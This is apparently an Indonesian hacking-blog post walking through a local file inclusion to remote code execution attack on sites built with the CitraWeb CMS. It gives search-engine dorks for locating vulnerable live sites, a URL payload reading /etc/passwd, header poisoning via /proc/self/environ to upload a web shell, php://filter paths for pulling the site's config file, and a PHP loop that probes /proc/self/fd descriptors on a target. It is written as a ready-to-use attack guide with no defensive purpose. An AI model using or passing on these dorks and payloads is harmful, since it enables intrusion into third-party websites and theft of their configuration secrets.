CitraWeb LFI to RCE




CXSECURITY : cxsecurity.com/issue/WLB-2019060011
> Dorking Dolo
DORK:
inurl:/cni-content/*/*.jpg
inurl:/cni-content/*/
intext:Designed & Developed by Citraweb Nusa Info Media
> Asumsikan w udah dpt target vuln check vuln gmna? host.com/system/ajax/?/etc/passwd
> Kita coba buka /proc/self/envrion
Coba lihat ada HTTP Header Kita :d tinggal ganti http header :v bisa User Agent , Accept, Cookie, dsb
Kita coba dengan Accept ea
Tinggal Upload Shell Deh :D caranya? wget aweokwaoek :v
klo /proc/self/environ gk ada gmna :D
bisa ngambil config :D caranya?
/system/ajax/?php://filter/convert.base64-encode/resource=cni-system/config/config.php
atau bisa /proc/self/fd/{NUMBER}
atau /home/{USER}/access-logs/{WEBSITE}

Untuk /proc/self/fd/{NUMBER} w pnya toolsnya :D
<?php
for($i=0; $i <= 1000; $i++){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, "https://{WEBSITE HERE}system/ajax/?php://filter/convert.base64-encode/resource=/proc/self/fd/$i");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $c = curl_exec($ch);
  $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  if($http == 200){
    echo $i. " -> Success\n";
  }
  else{
    echo $i . " -> Failed\n";
  }
}

- RINTOD -

1 Response to "CitraWeb LFI to RCE"

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel